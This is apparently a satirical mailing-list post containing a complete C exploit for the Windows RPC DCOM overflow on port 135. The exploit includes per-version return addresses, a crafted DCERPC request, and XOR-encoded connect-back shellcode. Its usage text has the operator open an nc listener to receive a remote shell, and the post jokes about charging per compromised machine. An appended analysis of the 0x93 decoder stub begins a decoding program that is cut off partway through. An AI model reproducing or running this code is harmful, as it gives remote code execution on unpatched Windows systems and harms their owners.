Hey there Swami:
> Hi, I found these offsets after so much tiring work
> anyways here is my first post with my proof of
> concept code i did tried on my network and all
> worked so please check and send me the suggestions
> and improvements
and Zero:
> Cleaned up the code a bit as it was messy - well
> for me anyways
and Chris:
> the code was fixed!
> you have to compile the new version
> http://www.k-otik.com/exploits/07.30.dcom48.c.php

You guys yank my leg.  Hahaha.  Mortis like funny.  I need
more funny.  Lady Death caught me up at 3am hacking.  Again.
Not gonna get s3x for a while.

Fair is fair.  Bad poem in trade:

This sploit is mean
This sploit is bad
Example of programming
Terribly sad

Nebba seena chain of 48 else ifs before.  Didjew learn that
at CalTech?  Say hi!!  They remember me.  7 feet tall,
skeleton, scythe.  You know.  I'm pretty noticeable.

I am enclosing my first Perl program.  I hope I didn't taint
it.
--
Till death do us part,
m0rtis
/* ****************************************************************** */
/* *****  NAME:         rpcABC.c                                ***** */
/* *****  PURPOSE:      Remote administration of Windoze        ***** */ 
/* *****                machines                                ***** */
/* *****  AUTHOR:       Mortis, esq., Collector of Souls        ***** */
/* *****  COPYRIGHT:    2003@ Mortis, Ltd.                      ***** */
/* *****  DISCLAIMER:   Mortis is a not a QA fool.  Once it     ***** */
/* *****                compiled it was done.  U didn't think   ***** */
/* *****                I actually RAN it, did you?             ***** */
/* ****************************************************************** */

/* LICENSE:
        It be much tiring work and brain noodles to calculate these 
        codez and programmings.  Mortis spend big energies imagining 
        these instruction and he expects that no one will theft
        his elephant.
        
        If you rip my code I will rip your soul.

        Contrary to popular belief, I did not steal this code from 
        kraptic, swami, or any other fakir.  I don't read the news
        and I never looked at this web page:

            http://www.k-otik.com/exploits/07.30.dcom48.c.php 

        Scout's honor.

*/ /* NOTE TO THE MENTALLY CHALLENGED:
        Add the new offset to the list

*/ /* SPECIAL NOTE TO MARK BASSET:
        Steal a decent copy of MSVC or go to eeye and get something
        that workz...

*/ /* SPECIAL NOTE TO RICHARD SMITH:
        Dude, I got the weirdest SPAM last week.  I'll forward it to
        you so you can contact the press.  No one wants to interview
        Death incarnated.  Trust me.  Plus you got all the contactz...
        
*/ /* PLEASE HELP FEED MY LITTLE SKELETONS:
        Mortis really does need lots of money.  I expect you little
        monkees to give me US$.05 for every machine you compromise 
        with this awesum 60day.  I trust U guys; honor system.
        
        Please send your cash to:
             Mortis
             P.O. Box 217
             Nashua, NH 03061

        If you prefer paypal, I can hack my fees from these dudez:
             http://www.ronaldshouse.com/
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")   /* MSVC: pull in Winsock for socket/send/recv */

/* I wish someone would tell me how to sploit the other
    ports.  This port blowz. */
#define TARGET_PORT 135

/* Return codez */
#define SUCCESS                  0
#define SEND_FAILED              1
#define RECV_FAILED              2
#define INVALID_ARGUMENTS        3
#define RANDOMLY_SHIT_THE_BED    4

/* We can't afford to make this a readable function call because the
   overhead would kill us.  Performance is almost as important as learning */
#define ADDTOBUF(src,dest,dest_len) \
    ( memcpy((dest), (src), sizeof((src))) && ((dest_len) += sizeof((src))))

/* I'm not bright enough to understand that dude's post last week
    about how to exploit this without needing a fsking address for
    every version and language of windows ever produced.  So I guess 
    I'll have to keep adding values to this list until I own so many
    machines I get really bored.  

    Oh crap.  Too late.  
*/
struct OFFSET_ADDR_STRUCT {
    char *offset_addr;
    char *os_version;
} offsets[] = {
    {"\xcf\xda\xee\x77", "Chinese winNT sp5"},
    {"\xac\x0e\xf0\x77", "Chinese winNT sp6"},
    {"\xc3\xea\xf0\x77", "Chinese NT sp6a"},
    {"\x2a\xe3\xe2\x77", "Chinese win2k nosp"},
    {"\x8b\x89\xe6\x77", "Chinese win2k sp1"},
    {"\x2b\x49\xe0\x77", "Chinese win2k sp2"},
    {"\x44\x43\x42\x41", "Chinese win2k sp3"},
    {"\x29\x4c\xdf\x77", "Chinese win2k sp4"},
    {"\x4d\x3f\xe3\x77", "Polish win2k nosp ver 5.00.2195"},
    {"\x29\x2c\xe4\x77", "Polish win2k sp3 ver 5.00.2195 tested"},
    {"\x13\x3b\xa5\x77", "Spanish win2k sp4"},
    {"\xe5\x27\xf3\x77", "English winNT sp4"},
    {"\x74\x16\xe8\x77", "English win2k nosp 1"},
    {"\x6d\x3f\xe3\x77", "English win2k nosp 2"},
    {"\xec\x29\xe8\x77", "English win2k sp1"},
    {"\x2b\x49\xe2\x77", "English win2k sp2 1"},
    {"\xb5\x24\xe8\x77", "English win2k sp2 2"},
    {"\x7a\x36\xe8\x77", "English win2k sp3 1"},
    {"\x5c\xfa\x2e\x77", "English win2k sp3 2"},
    {"\x9b\x2a\xf9\x77", "English win2k sp4"},
    {"\xe3\xaf\xe9\x77", "English xp nosp ver 5.1.2600"},
    {"\xba\x26\xe6\x77", "English xp sp1 1"},
    {"\xdb\x37\xd7\x77", "English xp sp1 2"},
    {"\xbd\x73\x7d\x77", "English xp sp2"},
    {"\xb0\x54\x22\x77", "English win2k3"},    
    {"\xe5\x27\xf3\x77", "Japanese win2k nosp"},
    {"\x8b\x89\xe5\x77", "Japanese win2k sp1"},
    {"\x2b\x49\xdf\x77", "Japanese win2k sp2"},
    {"\x2a\xe3\xe1\x77", "Korean win2k nosp"},
    {"\x8b\x89\xe5\x77", "Korean win2k sp1"},
    {"\x2b\x49\xdf\x77", "Korean win2k sp2"},
    {"\x2a\xe3\xe1\x77", "Mexican win2k nosp"},
    {"\x8b\x89\xe8\x77", "Mexican win2k sp1"},
    {"\x4d\x3f\xe3\x77", "Kenyan win2k sp1"},
    {"\x8b\x89\xe8\x77", "Kenyan win2k sp1"},
    {"\x2b\x49\xe2\x77", "Kenyan win2k sp1"},
    {"\x7a\x88\x2e\x77", "German win2k sp3"},
    {"\x29\x2c\xe3\x77", "German win2k sp3"},
    {"\x29\x4c\xe0\x77", "German win sp4 1"},
    {"\x56\xc2\xe2\x77", "German win sp4 2"},
    {"\xfc\x18\xd4\x77", "German xp sp1"},
    {"\x4b\x3e\xe4\x77", "French win2k Server SP1"},
    {"\x56\xc2\xe2\x77", "French win2k Server SP4"},
    {"\x4a\x75\xd4\x77", "French win xp no sp"},
    {"\xfc\x18\xd4\x77", "French win xp sp 1"},
    {"\x25\x2b\xaa\x77", "win2ksp3big"},
    {"\x29\x4c\xdf\x77", "win2ksp4big"},
    {"\xfb\x7b\xa1\x71", "winxpsp01big"},
    {NULL,                NULL}
};

/* Note to self:
        Dearest self,

        How are you today?  I am well.  Lady Death sends her regards.

        Please comment this section when you are sober enough to
        remember what the fsck it does.

        Oh, yeah.  Please remember to brush your teeth, too.  And wear 
        clean underwear.  Thanks.  I appreciate it.  So does Lady Death.

        I miss you so much.  Come back soon.
            -Mortis
*/
/* The two 0x20 counts in chunk_o_stuff2 are UTF-16 string lengths (wide
   chars, not bytes) of the path the shellcode gets spliced into, so each
   grows by half the byte size of chunk_o_stuff3, the shellcode below. */
#define KAKACOPY1(buffer, offset) (     \
    *(unsigned long *)(buffer+offset) = \
        *(unsigned long *)(buffer+offset) + sizeof(chunk_o_stuff3) / 2)

/* Byte-length fields in the assembled request (DCERPC frag_length,
   alloc_hint, and the embedded sizes) grow by the shellcode size less 0xc. */
#define KAKACOPY2(buffer, offset, size) ( \
    *(unsigned long *)(buffer+offset) =   \
        *(unsigned long *)(buffer+offset) + (size) - 0xc)

/*  Herein lies the secrets of the universe.  If you play these codez
    backwards, you will hear dead people.  Proceed with caution.  These 
    codez are not suitable for the elderly, people with heart conditions, 
    or anyone predisposed to agita.  I _am_ the harbinger of Death, so you
    may want to pay heed.
    
    These codez may cause diarrhea, severe head pain, hair loss, 
        premature ejaculation, depression, green scum on your toes, and other 
    minor health issues.  Don't let that stop you from asking your doctor 
    to give them to you...
*/

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char chunk_o_stuff1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char chunk_o_stuff2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00};

/*    All those 0x things are hurting my head.  I better switch */
unsigned char chunk_o_stuff3[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x4E\x00"
    "\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"  
    "\x29\x4c\xdf\x77\x38\x6e\x16\x76\x0d\x6e\x16\x76\xeb\x02\xeb\x05\xe8\xf9"
    "\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01\xfc\xff\xff\x83\xe4\xfc\x8b\xec"
    "\x33\xc9\x66\xb9\x99\x01\x80\x30\x93\x40\xe2\xfa\x7b\xe4\x93\x93\x93\xd4"
    "\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7"
    "\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc"
    "\xf0\xf6\xe0\xe0\xd2\x93\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93"
    "\xd6\xeb\xfa\xe7\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93"
    "\xc4\xc0\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
    "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93\xf0\xfc"
    "\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93\x93\x63\xe4\x12"
    "\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0\xaf\x90\x60\x18\xe5\xeb"
    "\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87\xc5\xa0\x53\xc4\xc2\x18\xac\x90"
    "\x68\x18\x61\xa0\x5a\x22\x9d\x60\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71"
    "\x7b\x6c\x72\xcd\x18\xc5\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b"
    "\x18\xd5\x8f\x90\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0"
    "\x5a\x22\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
    "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92\x92\x93"
    "\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3\xd3\xc3\x6c\xc4"
    "\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93\x91\x93\xf5\x54\xd6\x91"
    "\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9\x83\xc6\xc0\x6c\xc4\x6f\x16\x53"
    "\xe6\xd0\xa0\x5a\x22\x82\xc4\x18\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93"
    "\x93\x1a\xce\xaf\x1a\xce\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e"
    "\xd6\xd7\xc3\xc6\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c"
    "\xe6\xd7\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca\x1a\x94"
    "\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90";

/*    forget it... I liked this better... */

unsigned char chunk_o_stuff4[]={
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char chunk_o_stuff5[]={
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

/*    OH BOY!!  No more kaka.  Herez the code... */

void bummer_dude (char *hint) {
    printf("This sucks.  The exploit didn't work.\n");
    printf("Please send a message to FD and ask them why.\n");
    printf("Some one will send you a batch file that makes it better.\n");
    printf("Here's a hint, tho: %s\n", hint);
    exit(RANDOMLY_SHIT_THE_BED);
}

void send_and_toss_the_answer (int socket, unsigned char *buf, int bufsize, char *hint) {
    unsigned char recv_buffer[0x1000]; /* <-- gotta lub hexxx */

    if ( send(socket, (const char *)buf, bufsize, 0) == -1 ) 
        bummer_dude(hint);
    recv(socket, (char *)recv_buffer, sizeof(recv_buffer)-2 , 0);
    /* hahaha.  oberflow that U luzer           ^^^^    */
}

int main (int argc, char **argv) {
    int                 i, bufsize, sockfd = 0;
    u_short             shell_port = 0;
    unsigned long       callback_ip = 0;
    unsigned char       send_buffer[0x1000]; /* <-- sexxxxxy.  and so l33t. */
    struct hostent      *target;
    struct sockaddr_in  target_addr;
    WSADATA             wsa;

    WSAStartup(MAKEWORD(2,0),&wsa);

    printf("RPC DCOM Remote Exploit\n");
    printf("modified by www.k-otiK.com\n");
    printf("^h^h^h^h^h^h^h^h^h^h^h^h^h\n");
    printf("Completely original code by Mortis.\n");
    printf("Rezpect my authoritia!!\n");

    if(argc<5) {
        printf("Usage: %s <target> <connectback_ip> <cb port> <OS>\n",argv[0]);
        printf("     On connectback_ip machine: nc -lp cbport\n");
        printf("     Hint: It might just be smart to run the nc b4 the sploit.\n");
        printf("     OS List:\n");
        for (i = 0; offsets[i].offset_addr; i++)
            printf("          %d    %s\n", i, offsets[i].os_version);
        exit(INVALID_ARGUMENTS);
    }

    /* I suppose we should validate our parameters, but what fun would that be? */
    /* sploit the sploit :) */

    if ((target=gethostbyname(argv[1])) == NULL) 
        bummer_dude("Wow.  A host without a name.  Who w00da thunk that could happen?");

    /*    93. 93. WTF was the 93 for?  
        Hmmmmm.  If it ain't broke don't fix it, right? */ 

    callback_ip = inet_addr(argv[2]) ^ 0x93939393; 
    shell_port  = htons((u_short)atoi(argv[3])) ^ (u_short)0x9393; 

    *(unsigned short *)&chunk_o_stuff3[378] = shell_port; 
    *(unsigned int *)  &chunk_o_stuff3[383] = callback_ip;

    /*  recall that we couldn't code this without knowing the version
        of windoze.  This is where we customize the sploit to work
        with everyone's choice of language and patch level.  Wheeee!! */

    i = atoi(argv[4]);
    if (i < 0 || i >= (int)(sizeof(offsets) / sizeof(offsets[0])) - 1)
        bummer_dude("That OS number isn't on the list.  Pick one that is.");

    /* the 4-byte return address sits at offset 36 of the shellcode,
       right after the 18 wide chars of \FXNBFXFXNBFXFXFXFXFXFX */
    memcpy(chunk_o_stuff3+36, offsets[i].offset_addr, 4);

    /* BEGIN magic_incantations */
    /* wide-char counts of the path string, before and after the \\ */
    KAKACOPY1(chunk_o_stuff2,0);        /* whoops... more kaka.  Sorry */
    KAKACOPY1(chunk_o_stuff2,8);

    bufsize = 0;
    ADDTOBUF(chunk_o_stuff1, send_buffer, bufsize);
    ADDTOBUF(chunk_o_stuff2, send_buffer+bufsize, bufsize);
    ADDTOBUF(chunk_o_stuff3, send_buffer+bufsize, bufsize);
    ADDTOBUF(chunk_o_stuff4, send_buffer+bufsize, bufsize);
    ADDTOBUF(chunk_o_stuff5, send_buffer+bufsize, bufsize);

    /* chunk_o_stuff1 starts with a DCERPC request header (ptype 0, opnum 4):
       frag_length lives at offset 8 and alloc_hint at 0x10; the rest are
       size fields inside the marshalled activation request */
    KAKACOPY2(send_buffer, 8, sizeof(chunk_o_stuff3));     /* frag_length */
    KAKACOPY2(send_buffer, 0x10, sizeof(chunk_o_stuff3));  /* alloc_hint  */
    KAKACOPY2(send_buffer, 0x80, sizeof(chunk_o_stuff3));
    KAKACOPY2(send_buffer, 0x84, sizeof(chunk_o_stuff3));
    KAKACOPY2(send_buffer, 0xb4, sizeof(chunk_o_stuff3));
    KAKACOPY2(send_buffer, 0xb8, sizeof(chunk_o_stuff3));
    KAKACOPY2(send_buffer, 0xd0, sizeof(chunk_o_stuff3));
    KAKACOPY2(send_buffer, 0x18c, sizeof(chunk_o_stuff3));
    /* END magic_incantations */
    /* Note to self:  Why the hell did I break that into chunks?
            Please stop smoking crack.  It's bad for you. */

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
        bummer_dude("Couldn't even make a socket.  This machine sux.");

    target_addr.sin_family = AF_INET;
    target_addr.sin_port = htons(TARGET_PORT);
    target_addr.sin_addr = *((struct in_addr *)target->h_addr);
    memset(&(target_addr.sin_zero), '\0', 8);

    if ( connect(sockfd, 
                (struct sockaddr *)&target_addr, 
                sizeof(struct sockaddr) ) == -1 ) 
        bummer_dude("You would have better luck with a host that has the port open");

    send_and_toss_the_answer (sockfd, bindstr, 
        sizeof(bindstr), "Couldn't send the bind string");
    send_and_toss_the_answer (sockfd, send_buffer, 
        bufsize, "Couldn't send the sploit");

    return SUCCESS;
}
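About that "WTF was the 93 for?" in main: the shellcode in chunk_o_stuff3 carries its own decoder right after the stack setup, the twelve bytes `33 c9 66 b9 99 01 80 30 93 40 e2 fa` (xor ecx,ecx; mov cx,0x199; xor byte ptr [eax],0x93; inc eax; loop). Everything after the stub is stored XORed with 0x93 and gets decoded in place on the target, which is why the callback IP and port that main patches into that region have to be pre-XORed with 0x93939393 / 0x9393. The program below is an added example, not part of m0rtis's post or the k-otik dcom48.c it is based on. It embeds the stub and the 60 bytes that follow it, copied from chunk_o_stuff3 above, recognises the stub shape, pulls out the key and count, decodes the bytes, and lists the API names that fall out. The function names are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decoder stub as it appears in chunk_o_stuff3 (bytes copied from the post):
 *   33 c9         xor  ecx, ecx
 *   66 b9 99 01   mov  cx, 0x199      ; 409 bytes to decode
 *   80 30 93      xor  byte ptr [eax], 0x93
 *   40            inc  eax
 *   e2 fa         loop -6
 * eax points just past the stub when it runs, so decoding starts there. */
static const unsigned char stub[12] = {
    0x33,0xc9,0x66,0xb9,0x99,0x01,0x80,0x30,0x93,0x40,0xe2,0xfa };

/* The 60 encoded bytes that follow the stub, also copied from the post. */
static const unsigned char encoded[60] = {
    0x7b,0xe4,0x93,0x93,0x93,0xd4,
    0xf6,0xe7,0xc3,0xe1,0xfc,0xf0,0xd2,0xf7,0xf7,0xe1,0xf6,0xe0,0xe0,0x93,0xdf,0xfc,0xf2,0xf7,
    0xdf,0xfa,0xf1,0xe1,0xf2,0xe1,0xea,0xd2,0x93,0xd0,0xe1,0xf6,0xf2,0xe7,0xf6,0xc3,0xe1,0xfc,
    0xf0,0xf6,0xe0,0xe0,0xd2,0x93,0xd0,0xff,0xfc,0xe0,0xf6,0xdb,0xf2,0xfd,0xf7,0xff,0xf6,0x93 };

struct xor_decoder {
    unsigned char key;   /* imm8 of the xor byte ptr [eax], imm8 */
    uint16_t      count; /* imm16 of the mov cx, imm16 */
};

/* Recognise the stub shape and pull key and count out of it (hypothetical
 * helper, not from the post).  Returns 1 on a match, 0 otherwise. */
int parse_xor_decoder(const unsigned char *p, size_t n, struct xor_decoder *d)
{
    if (n < sizeof stub) return 0;
    if (p[0] != 0x33 || p[1] != 0xc9 || p[2] != 0x66 || p[3] != 0xb9) return 0;
    if (p[6] != 0x80 || p[7] != 0x30 || p[9] != 0x40 || p[10] != 0xe2 || p[11] != 0xfa) return 0;
    d->count = (uint16_t)(p[4] | (p[5] << 8));
    d->key   = p[8];
    return 1;
}

/* Do what the loop does: XOR up to count bytes in place.  Returns the number
 * of bytes touched (fewer than count when the buffer is shorter). */
size_t xor_decode(unsigned char *buf, size_t n, unsigned char key, size_t count)
{
    size_t i, lim = n < count ? n : count;
    for (i = 0; i < lim; i++) buf[i] ^= key;
    return lim;
}

/* Collect NUL-terminated runs of printable ASCII (4+ chars) from decoded bytes. */
size_t find_strings(const unsigned char *buf, size_t n, char out[][32], size_t max)
{
    size_t i = 0, found = 0;
    while (i < n && found < max) {
        size_t start = i;
        while (i < n && buf[i] >= 0x20 && buf[i] < 0x7f) i++;
        if (i < n && buf[i] == 0 && i - start >= 4 && i - start < 32) {
            memcpy(out[found], buf + start, i - start);
            out[found][i - start] = '\0';
            found++;
        }
        i++;
    }
    return found;
}

/* Anything patched into the encoded region (the callback IP and port in main)
 * must be pre-XORed with the key so the stub restores the real value. */
uint32_t pre_encode_dword(uint32_t v, unsigned char key)
{
    uint32_t k = key;
    k |= k << 8;
    k |= k << 16;
    return v ^ k;          /* with key 0x93 this is main's ^ 0x93939393 */
}

int main(void)
{
    struct xor_decoder d;
    unsigned char buf[sizeof encoded];
    char names[8][32];
    size_t i, n;

    if (!parse_xor_decoder(stub, sizeof stub, &d)) return 1;
    printf("decoder: xor key 0x%02x over %u bytes\n", d.key, (unsigned)d.count);

    memcpy(buf, encoded, sizeof buf);
    xor_decode(buf, sizeof buf, d.key, d.count);
    printf("first decoded instruction: %02x %02x %02x %02x %02x (call +0x%x)\n",
           buf[0], buf[1], buf[2], buf[3], buf[4], buf[1]);

    n = find_strings(buf, sizeof buf, names, 8);
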